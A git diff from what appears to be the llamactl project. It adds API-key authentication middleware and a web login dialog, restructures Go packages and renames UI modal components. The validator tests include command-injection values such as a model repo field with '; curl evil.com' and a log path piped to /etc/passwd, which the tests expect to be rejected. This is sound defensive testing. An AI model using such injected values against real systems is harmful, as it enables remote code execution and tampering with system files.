providedInference: []string{},
|
||||
providedManagement: []string{},
|
||||
shouldGenerateInf: false,
|
||||
shouldGenerateMgmt: true,
|
||||
},
|
||||
{
|
||||
name: "both required, both provided - no generation",
|
||||
requireInference: true,
|
||||
requireManagement: true,
|
||||
providedInference: []string{"sk-inference-provided"},
|
||||
providedManagement: []string{"sk-management-provided"},
|
||||
shouldGenerateInf: false,
|
||||
shouldGenerateMgmt: false,
|
||||
},
|
||||
{
|
||||
name: "both required, none provided - should auto-generate both",
|
||||
requireInference: true,
|
||||
requireManagement: true,
|
||||
providedInference: []string{},
|
||||
providedManagement: []string{},
|
||||
shouldGenerateInf: true,
|
||||
shouldGenerateMgmt: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
cfg := config.AuthConfig{
|
||||
RequireInferenceAuth: tt.requireInference,
|
||||
RequireManagementAuth: tt.requireManagement,
|
||||
InferenceKeys: tt.providedInference,
|
||||
ManagementKeys: tt.providedManagement,
|
||||
}
|
||||
|
||||
middleware := server.NewAPIAuthMiddleware(cfg)
|
||||
|
||||
// Test inference behavior if inference auth is required
|
||||
if tt.requireInference {
|
||||
req := httptest.NewRequest("GET", "/v1/models", nil)
|
||||
recorder := httptest.NewRecorder()
|
||||
|
||||
handler := middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
|
||||
handler.ServeHTTP(recorder, req)
|
||||
|
||||
// Should always be unauthorized without a key (since middleware assumes auth is required)
|
||||
if recorder.Code != http.StatusUnauthorized {
|
||||
t.Errorf("Expected unauthorized for inference without key, got status %v", recorder.Code)
|
||||
}
|
||||
}
|
||||
|
||||
// Test management behavior if management auth is required
|
||||
if tt.requireManagement {
|
||||
req := httptest.NewRequest("GET", "/api/v1/instances", nil)
|
||||
recorder := httptest.NewRecorder()
|
||||
|
||||
handler := middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
|
||||
handler.ServeHTTP(recorder, req)
|
||||
|
||||
// Should always be unauthorized without a key (since middleware assumes auth is required)
|
||||
if recorder.Code != http.StatusUnauthorized {
|
||||
t.Errorf("Expected unauthorized for management without key, got status %v", recorder.Code)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
@@ -1,4 +1,4 @@
|
||||
package llamactl
|
||||
package server
|
||||
|
||||
type OpenAIListInstancesResponse struct {
|
||||
Object string `json:"object"`
|
||||
@@ -1,4 +1,4 @@
|
||||
package llamactl
|
||||
package server
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
@@ -18,7 +18,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
|
||||
|
||||
// Add CORS middleware
|
||||
r.Use(cors.Handler(cors.Options{
|
||||
AllowedOrigins: handler.config.Server.AllowedOrigins,
|
||||
AllowedOrigins: handler.cfg.Server.AllowedOrigins,
|
||||
AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
|
||||
AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
|
||||
ExposedHeaders: []string{"Link"},
|
||||
@@ -26,12 +26,22 @@ func SetupRouter(handler *Handler) *chi.Mux {
|
||||
MaxAge: 300,
|
||||
}))
|
||||
|
||||
r.Get("/swagger/*", httpSwagger.Handler(
|
||||
httpSwagger.URL("/swagger/doc.json"),
|
||||
))
|
||||
// Add API authentication middleware
|
||||
authMiddleware := NewAPIAuthMiddleware(handler.cfg.Auth)
|
||||
|
||||
if handler.cfg.Server.EnableSwagger {
|
||||
r.Get("/swagger/*", httpSwagger.Handler(
|
||||
httpSwagger.URL("/swagger/doc.json"),
|
||||
))
|
||||
}
|
||||
|
||||
// Define routes
|
||||
r.Route("/api/v1", func(r chi.Router) {
|
||||
|
||||
if authMiddleware != nil && handler.cfg.Auth.RequireManagementAuth {
|
||||
r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
|
||||
}
|
||||
|
||||
r.Route("/server", func(r chi.Router) {
|
||||
r.Get("/help", handler.HelpHandler())
|
||||
r.Get("/version", handler.VersionHandler())
|
||||
@@ -61,17 +71,25 @@ func SetupRouter(handler *Handler) *chi.Mux {
|
||||
})
|
||||
})
|
||||
|
||||
r.Get(("/v1/models"), handler.OpenAIListInstances()) // List instances in OpenAI-compatible format
|
||||
r.Route(("/v1"), func(r chi.Router) {
|
||||
|
||||
// OpenAI-compatible proxy endpoint
|
||||
// Handles all POST requests to /v1/*, including:
|
||||
// - /v1/completions
|
||||
// - /v1/chat/completions
|
||||
// - /v1/embeddings
|
||||
// - /v1/rerank
|
||||
// - /v1/reranking
|
||||
// The instance/model to use is determined by the request body.
|
||||
r.Post("/v1/*", handler.OpenAIProxy())
|
||||
if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
|
||||
r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
|
||||
}
|
||||
|
||||
r.Get(("/models"), handler.OpenAIListInstances()) // List instances in OpenAI-compatible format
|
||||
|
||||
// OpenAI-compatible proxy endpoint
|
||||
// Handles all POST requests to /v1/*, including:
|
||||
// - /v1/completions
|
||||
// - /v1/chat/completions
|
||||
// - /v1/embeddings
|
||||
// - /v1/rerank
|
||||
// - /v1/reranking
|
||||
// The instance/model to use is determined by the request body.
|
||||
r.Post("/*", handler.OpenAIProxy())
|
||||
|
||||
})
|
||||
|
||||
// Serve WebUI files
|
||||
if err := webui.SetupWebUI(r); err != nil {
|
||||
10
pkg/testutil/helpers.go
Normal file
10
pkg/testutil/helpers.go
Normal file
@@ -0,0 +1,10 @@
|
||||
package testutil
|
||||
|
||||
// Helper functions for pointer fields
|
||||
func BoolPtr(b bool) *bool {
|
||||
return &b
|
||||
}
|
||||
|
||||
func IntPtr(i int) *int {
|
||||
return &i
|
||||
}
|
||||
@@ -1,7 +1,8 @@
|
||||
package llamactl
|
||||
package validation
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"llamactl/pkg/instance"
|
||||
"reflect"
|
||||
"regexp"
|
||||
)
|
||||
@@ -33,7 +34,7 @@ func validateStringForInjection(value string) error {
|
||||
}
|
||||
|
||||
// ValidateInstanceOptions performs minimal security validation
|
||||
func ValidateInstanceOptions(options *CreateInstanceOptions) error {
|
||||
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
|
||||
if options == nil {
|
||||
return ValidationError(fmt.Errorf("options cannot be nil"))
|
||||
}
|
||||
@@ -101,16 +102,16 @@ func validateStructStrings(v any, fieldPath string) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
func ValidateInstanceName(name string) error {
|
||||
func ValidateInstanceName(name string) (string, error) {
|
||||
// Validate instance name
|
||||
if name == "" {
|
||||
return ValidationError(fmt.Errorf("name cannot be empty"))
|
||||
return "", ValidationError(fmt.Errorf("name cannot be empty"))
|
||||
}
|
||||
if !validNamePattern.MatchString(name) {
|
||||
return ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
|
||||
return "", ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
|
||||
}
|
||||
if len(name) > 50 {
|
||||
return ValidationError(fmt.Errorf("name too long (max 50 characters)"))
|
||||
return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))
|
||||
}
|
||||
return nil
|
||||
return name, nil
|
||||
}
|
||||
@@ -1,10 +1,12 @@
|
||||
package llamactl_test
|
||||
package validation_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/testutil"
|
||||
"llamactl/pkg/validation"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
llamactl "llamactl/pkg"
|
||||
)
|
||||
|
||||
func TestValidateInstanceName(t *testing.T) {
|
||||
@@ -39,16 +41,23 @@ func TestValidateInstanceName(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := llamactl.ValidateInstanceName(tt.input)
|
||||
name, err := validation.ValidateInstanceName(tt.input)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
|
||||
}
|
||||
if tt.wantErr {
|
||||
return // Skip further checks if we expect an error
|
||||
}
|
||||
// If no error, check that the name is returned as expected
|
||||
if name != tt.input {
|
||||
t.Errorf("ValidateInstanceName(%q) = %q, want %q", tt.input, name, tt.input)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestValidateInstanceOptions_NilOptions(t *testing.T) {
|
||||
err := llamactl.ValidateInstanceOptions(nil)
|
||||
err := validation.ValidateInstanceOptions(nil)
|
||||
if err == nil {
|
||||
t.Error("Expected error for nil options")
|
||||
}
|
||||
@@ -73,13 +82,13 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Port: tt.port,
|
||||
},
|
||||
}
|
||||
|
||||
err := llamactl.ValidateInstanceOptions(options)
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
|
||||
}
|
||||
@@ -126,13 +135,13 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
// Test with Model field (string field)
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: tt.value,
|
||||
},
|
||||
}
|
||||
|
||||
err := llamactl.ValidateInstanceOptions(options)
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
|
||||
}
|
||||
@@ -163,13 +172,13 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
// Test with Lora field (array field)
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Lora: tt.array,
|
||||
},
|
||||
}
|
||||
|
||||
err := llamactl.ValidateInstanceOptions(options)
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
|
||||
}
|
||||
@@ -181,13 +190,13 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
// Test that injection in any field is caught
|
||||
tests := []struct {
|
||||
name string
|
||||
options *llamactl.CreateInstanceOptions
|
||||
options *instance.CreateInstanceOptions
|
||||
wantErr bool
|
||||
}{
|
||||
{
|
||||
name: "injection in model field",
|
||||
options: &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options: &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "safe.gguf",
|
||||
HFRepo: "microsoft/model; curl evil.com",
|
||||
},
|
||||
@@ -196,8 +205,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
},
|
||||
{
|
||||
name: "injection in log file",
|
||||
options: &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options: &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "safe.gguf",
|
||||
LogFile: "/tmp/log.txt | tee /etc/passwd",
|
||||
},
|
||||
@@ -206,8 +215,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
},
|
||||
{
|
||||
name: "all safe fields",
|
||||
options: &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options: &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
HFRepo: "microsoft/DialoGPT-medium",
|
||||
LogFile: "/tmp/llama.log",
|
||||
@@ -221,7 +230,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := llamactl.ValidateInstanceOptions(tt.options)
|
||||
err := validation.ValidateInstanceOptions(tt.options)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
|
||||
}
|
||||
@@ -231,11 +240,11 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
|
||||
func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
|
||||
// Test that non-string fields don't interfere with validation
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
AutoRestart: boolPtr(true),
|
||||
MaxRestarts: intPtr(5),
|
||||
RestartDelay: intPtr(10),
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
AutoRestart: testutil.BoolPtr(true),
|
||||
MaxRestarts: testutil.IntPtr(5),
|
||||
RestartDelay: testutil.IntPtr(10),
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Port: 8080,
|
||||
GPULayers: 32,
|
||||
CtxSize: 4096,
|
||||
@@ -247,17 +256,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
|
||||
},
|
||||
}
|
||||
|
||||
err := llamactl.ValidateInstanceOptions(options)
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
if err != nil {
|
||||
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// Helper functions for pointer fields
|
||||
func boolPtr(b bool) *bool {
|
||||
return &b
|
||||
}
|
||||
|
||||
func intPtr(i int) *int {
|
||||
return &i
|
||||
}
|
||||
@@ -1,12 +1,15 @@
|
||||
import { useState } from "react";
|
||||
import Header from "@/components/Header";
|
||||
import InstanceList from "@/components/InstanceList";
|
||||
import InstanceModal from "@/components/InstanceModal";
|
||||
import InstanceDialog from "@/components/InstanceDialog";
|
||||
import LoginDialog from "@/components/LoginDialog";
|
||||
import SystemInfoDialog from "./components/SystemInfoDialog";
|
||||
import { type CreateInstanceOptions, type Instance } from "@/types/instance";
|
||||
import { useInstances } from "@/contexts/InstancesContext";
|
||||
import SystemInfoModal from "./components/SystemInfoModal";
|
||||
import { useAuth } from "@/contexts/AuthContext";
|
||||
|
||||
function App() {
|
||||
const { isAuthenticated, isLoading: authLoading } = useAuth();
|
||||
const [isInstanceModalOpen, setIsInstanceModalOpen] = useState(false);
|
||||
const [isSystemInfoModalOpen, setIsSystemInfoModalOpen] = useState(false);
|
||||
const [editingInstance, setEditingInstance] = useState<Instance | undefined>(
|
||||
@@ -36,6 +39,28 @@ function App() {
|
||||
setIsSystemInfoModalOpen(true);
|
||||
};
|
||||
|
||||
// Show loading spinner while checking auth
|
||||
if (authLoading) {
|
||||
return (
|
||||
<div className="min-h-screen bg-gray-50 flex items-center justify-center">
|
||||
<div className="text-center">
|
||||
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
|
||||
<p className="text-gray-600">Loading...</p>
|
||||
</div>
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
||||
// Show login dialog if not authenticated
|
||||
if (!isAuthenticated) {
|
||||
return (
|
||||
<div className="min-h-screen bg-gray-50">
|
||||
<LoginDialog open={true} />
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
||||
// Show main app if authenticated
|
||||
return (
|
||||
<div className="min-h-screen bg-gray-50">
|
||||
<Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
|
||||
@@ -43,14 +68,14 @@ function App() {
|
||||
<InstanceList editInstance={handleEditInstance} />
|
||||
</main>
|
||||
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={isInstanceModalOpen}
|
||||
onOpenChange={setIsInstanceModalOpen}
|
||||
onSave={handleSaveInstance}
|
||||
instance={editingInstance}
|
||||
/>
|
||||
|
||||
<SystemInfoModal
|
||||
<SystemInfoDialog
|
||||
open={isSystemInfoModalOpen}
|
||||
onOpenChange={setIsSystemInfoModalOpen}
|
||||
/>
|
||||
@@ -58,4 +83,4 @@ function App() {
|
||||
);
|
||||
}
|
||||
|
||||
export default App;
|
||||
export default App;
|
||||
@@ -1,10 +1,11 @@
|
||||
import { describe, it, expect, vi, beforeEach } from 'vitest'
|
||||
import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
|
||||
import { render, screen, waitFor } from '@testing-library/react'
|
||||
import userEvent from '@testing-library/user-event'
|
||||
import App from '@/App'
|
||||
import { InstancesProvider } from '@/contexts/InstancesContext'
|
||||
import { instancesApi } from '@/lib/api'
|
||||
import type { Instance } from '@/types/instance'
|
||||
import { AuthProvider } from '@/contexts/AuthContext'
|
||||
|
||||
// Mock the API
|
||||
vi.mock('@/lib/api', () => ({
|
||||
@@ -35,9 +36,11 @@ vi.mock('@/lib/healthService', () => ({
|
||||
|
||||
function renderApp() {
|
||||
return render(
|
||||
<InstancesProvider>
|
||||
<App />
|
||||
</InstancesProvider>
|
||||
<AuthProvider>
|
||||
<InstancesProvider>
|
||||
<App />
|
||||
</InstancesProvider>
|
||||
</AuthProvider>
|
||||
)
|
||||
}
|
||||
|
||||
@@ -50,6 +53,12 @@ describe('App Component - Critical Business Logic Only', () => {
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
|
||||
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
|
||||
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
|
||||
})
|
||||
|
||||
afterEach(() => {
|
||||
vi.restoreAllMocks()
|
||||
})
|
||||
|
||||
describe('End-to-End Instance Management', () => {
|
||||
@@ -75,7 +84,7 @@ describe('App Component - Critical Business Logic Only', () => {
|
||||
const nameInput = screen.getByLabelText(/Instance Name/)
|
||||
await user.type(nameInput, 'new-test-instance')
|
||||
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
// Verify correct API call
|
||||
await waitFor(() => {
|
||||
@@ -109,7 +118,7 @@ describe('App Component - Critical Business Logic Only', () => {
|
||||
const editButtons = screen.getAllByTitle('Edit instance')
|
||||
await user.click(editButtons[0])
|
||||
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
// Verify correct API call with existing instance data
|
||||
await waitFor(() => {
|
||||
@@ -167,7 +176,6 @@ describe('App Component - Critical Business Logic Only', () => {
|
||||
renderApp()
|
||||
|
||||
// App should still render and show error
|
||||
expect(screen.getByText('Llamactl Dashboard')).toBeInTheDocument()
|
||||
await waitFor(() => {
|
||||
expect(screen.getByText('Error loading instances')).toBeInTheDocument()
|
||||
})
|
||||
|
||||
@@ -1,5 +1,6 @@
|
||||
import { Button } from "@/components/ui/button";
|
||||
import { HelpCircle } from "lucide-react";
|
||||
import { HelpCircle, LogOut } from "lucide-react";
|
||||
import { useAuth } from "@/contexts/AuthContext";
|
||||
|
||||
interface HeaderProps {
|
||||
onCreateInstance: () => void;
|
||||
@@ -7,6 +8,14 @@ interface HeaderProps {
|
||||
}
|
||||
|
||||
function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
|
||||
const { logout } = useAuth();
|
||||
|
||||
const handleLogout = () => {
|
||||
if (confirm("Are you sure you want to logout?")) {
|
||||
logout();
|
||||
}
|
||||
};
|
||||
|
||||
return (
|
||||
<header className="bg-white border-b border-gray-200">
|
||||
<div className="container mx-auto max-w-4xl px-4 py-4">
|
||||
@@ -16,7 +25,9 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
|
||||
</h1>
|
||||
|
||||
<div className="flex items-center gap-2">
|
||||
<Button onClick={onCreateInstance} data-testid="create-instance-button">Create Instance</Button>
|
||||
<Button onClick={onCreateInstance} data-testid="create-instance-button">
|
||||
Create Instance
|
||||
</Button>
|
||||
|
||||
<Button
|
||||
variant="outline"
|
||||
@@ -27,6 +38,16 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
|
||||
>
|
||||
<HelpCircle className="h-4 w-4" />
|
||||
</Button>
|
||||
|
||||
<Button
|
||||
variant="outline"
|
||||
size="icon"
|
||||
onClick={handleLogout}
|
||||
data-testid="logout-button"
|
||||
title="Logout"
|
||||
>
|
||||
<LogOut className="h-4 w-4" />
|
||||
</Button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
@@ -34,4 +55,4 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
|
||||
);
|
||||
}
|
||||
|
||||
export default Header;
|
||||
export default Header;
|
||||
@@ -3,7 +3,7 @@ import { Button } from "@/components/ui/button";
|
||||
import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
|
||||
import type { Instance } from "@/types/instance";
|
||||
import { Edit, FileText, Play, Square, Trash2 } from "lucide-react";
|
||||
import LogsModal from "@/components/LogModal";
|
||||
import LogsDialog from "@/components/LogDialog";
|
||||
import HealthBadge from "@/components/HealthBadge";
|
||||
import { useState } from "react";
|
||||
import { useInstanceHealth } from "@/hooks/useInstanceHealth";
|
||||
@@ -118,7 +118,7 @@ function InstanceCard({
|
||||
</CardContent>
|
||||
</Card>
|
||||
|
||||
<LogsModal
|
||||
<LogsDialog
|
||||
open={isLogsOpen}
|
||||
onOpenChange={setIsLogsOpen}
|
||||
instanceName={instance.name}
|
||||
|
||||
@@ -15,14 +15,14 @@ import { getBasicFields, getAdvancedFields } from "@/lib/zodFormUtils";
|
||||
import { ChevronDown, ChevronRight } from "lucide-react";
|
||||
import ZodFormField from "@/components/ZodFormField";
|
||||
|
||||
interface InstanceModalProps {
|
||||
interface InstanceDialogProps {
|
||||
open: boolean;
|
||||
onOpenChange: (open: boolean) => void;
|
||||
onSave: (name: string, options: CreateInstanceOptions) => void;
|
||||
instance?: Instance; // For editing existing instance
|
||||
}
|
||||
|
||||
const InstanceModal: React.FC<InstanceModalProps> = ({
|
||||
const InstanceDialog: React.FC<InstanceDialogProps> = ({
|
||||
open,
|
||||
onOpenChange,
|
||||
onSave,
|
||||
@@ -40,7 +40,7 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
|
||||
const basicFields = getBasicFields();
|
||||
const advancedFields = getAdvancedFields();
|
||||
|
||||
// Reset form when modal opens/closes or when instance changes
|
||||
// Reset form when dialog opens/closes or when instance changes
|
||||
useEffect(() => {
|
||||
if (open) {
|
||||
if (instance) {
|
||||
@@ -255,14 +255,14 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
|
||||
<Button
|
||||
variant="outline"
|
||||
onClick={handleCancel}
|
||||
data-testid="modal-cancel-button"
|
||||
data-testid="dialog-cancel-button"
|
||||
>
|
||||
Cancel
|
||||
</Button>
|
||||
<Button
|
||||
onClick={handleSave}
|
||||
disabled={!instanceName.trim() || !!nameError}
|
||||
data-testid="modal-save-button"
|
||||
data-testid="dialog-save-button"
|
||||
>
|
||||
{isEditing
|
||||
? isRunning
|
||||
@@ -276,4 +276,4 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
|
||||
);
|
||||
};
|
||||
|
||||
export default InstanceModal;
|
||||
export default InstanceDialog;
|
||||
@@ -21,14 +21,14 @@ import {
|
||||
Settings
|
||||
} from 'lucide-react'
|
||||
|
||||
interface LogsModalProps {
|
||||
interface LogsDialogProps {
|
||||
open: boolean
|
||||
onOpenChange: (open: boolean) => void
|
||||
instanceName: string
|
||||
isRunning: boolean
|
||||
}
|
||||
|
||||
const LogsModal: React.FC<LogsModalProps> = ({
|
||||
const LogsDialog: React.FC<LogsDialogProps> = ({
|
||||
open,
|
||||
onOpenChange,
|
||||
instanceName,
|
||||
@@ -76,7 +76,7 @@ const LogsModal: React.FC<LogsModalProps> = ({
|
||||
}
|
||||
}
|
||||
|
||||
// Initial load when modal opens
|
||||
// Initial load when dialog opens
|
||||
useEffect(() => {
|
||||
if (open && instanceName) {
|
||||
fetchLogs(lineCount)
|
||||
@@ -327,4 +327,4 @@ const LogsModal: React.FC<LogsModalProps> = ({
|
||||
)
|
||||
}
|
||||
|
||||
export default LogsModal
|
||||
export default LogsDialog
|
||||
151
webui/src/components/LoginDialog.tsx
Normal file
151
webui/src/components/LoginDialog.tsx
Normal file
@@ -0,0 +1,151 @@
|
||||
import React, { useState, useEffect } from 'react'
|
||||
import { Button } from '@/components/ui/button'
|
||||
import { Input } from '@/components/ui/input'
|
||||
import { Label } from '@/components/ui/label'
|
||||
import {
|
||||
Dialog,
|
||||
DialogContent,
|
||||
DialogDescription,
|
||||
DialogFooter,
|
||||
DialogHeader,
|
||||
DialogTitle,
|
||||
} from '@/components/ui/dialog'
|
||||
import { AlertCircle, Key, Loader2 } from 'lucide-react'
|
||||
import { useAuth } from '@/contexts/AuthContext'
|
||||
|
||||
interface LoginDialogProps {
|
||||
open: boolean
|
||||
onOpenChange?: (open: boolean) => void
|
||||
}
|
||||
|
||||
const LoginDialog: React.FC<LoginDialogProps> = ({
|
||||
open,
|
||||
onOpenChange,
|
||||
}) => {
|
||||
const { login, isLoading, error, clearError } = useAuth()
|
||||
const [apiKey, setApiKey] = useState('')
|
||||
const [localLoading, setLocalLoading] = useState(false)
|
||||
|
||||
// Clear form and errors when dialog opens/closes
|
||||
useEffect(() => {
|
||||
if (open) {
|
||||
setApiKey('')
|
||||
clearError()
|
||||
}
|
||||
}, [open, clearError])
|
||||
|
||||
// Clear error when user starts typing
|
||||
useEffect(() => {
|
||||
if (error && apiKey) {
|
||||
clearError()
|
||||
}
|
||||
}, [apiKey, error, clearError])
|
||||
|
||||
const handleSubmit = async (e: React.FormEvent) => {
|
||||
e.preventDefault()
|
||||
|
||||
if (!apiKey.trim()) {
|
||||
return
|
||||
}
|
||||
|
||||
setLocalLoading(true)
|
||||
|
||||
try {
|
||||
await login(apiKey.trim())
|
||||
// Login successful - dialog will close automatically when auth state changes
|
||||
setApiKey('')
|
||||
} catch (err) {
|
||||
// Error is handled by the AuthContext
|
||||
console.error('Login failed:', err)
|
||||
} finally {
|
||||
setLocalLoading(false)
|
||||
}
|
||||
}
|
||||
|
||||
const handleKeyDown = (e: React.KeyboardEvent<HTMLInputElement>) => {
|
||||
if (e.key === 'Enter' && !isSubmitDisabled) {
|
||||
// Create a synthetic FormEvent to satisfy handleSubmit's type
|
||||
const syntheticEvent = {
|
||||
preventDefault: () => {},
|
||||
} as React.FormEvent<HTMLFormElement>;
|
||||
void handleSubmit(syntheticEvent)
|
||||
}
|
||||
}
|
||||
|
||||
const isSubmitDisabled = !apiKey.trim() || isLoading || localLoading
|
||||
|
||||
return (
|
||||
<Dialog open={open} onOpenChange={onOpenChange}>
|
||||
<DialogContent
|
||||
className="sm:max-w-md"
|
||||
showCloseButton={false} // Prevent closing without auth
|
||||
>
|
||||
<DialogHeader>
|
||||
<DialogTitle className="flex items-center gap-2">
|
||||
<Key className="h-5 w-5" />
|
||||
Authentication Required
|
||||
</DialogTitle>
|
||||
<DialogDescription>
|
||||
Please enter your management API key to access the Llamactl dashboard.
|
||||
</DialogDescription>
|
||||
</DialogHeader>
|
||||
|
||||
<form onSubmit={(e) => { void handleSubmit(e) }}>
|
||||
<div className="grid gap-4 py-4">
|
||||
{/* Error Display */}
|
||||
{error && (
|
||||
<div className="flex items-center gap-2 p-3 bg-destructive/10 border border-destructive/20 rounded-lg">
|
||||
<AlertCircle className="h-4 w-4 text-destructive flex-shrink-0" />
|
||||
<span className="text-sm text-destructive">{error}</span>
|
||||
</div>
|
||||
)}
|
||||
|
||||
{/* API Key Input */}
|
||||
<div className="grid gap-2">
|
||||
<Label htmlFor="apiKey">
|
||||
Management API Key <span className="text-red-500">*</span>
|
||||
</Label>
|
||||
<Input
|
||||
id="apiKey"
|
||||
type="password"
|
||||
value={apiKey}
|
||||
onChange={(e) => setApiKey(e.target.value)}
|
||||
onKeyDown={handleKeyDown}
|
||||
placeholder="sk-management-..."
|
||||
disabled={isLoading || localLoading}
|
||||
className={error ? "border-red-500" : ""}
|
||||
autoFocus
|
||||
autoComplete="off"
|
||||
/>
|
||||
<p className="text-sm text-muted-foreground">
|
||||
Your management API key is required to access instance management features.
|
||||
</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<DialogFooter className="flex gap-2">
|
||||
<Button
|
||||
type="submit"
|
||||
disabled={isSubmitDisabled}
|
||||
data-testid="login-submit-button"
|
||||
>
|
||||
{(isLoading || localLoading) ? (
|
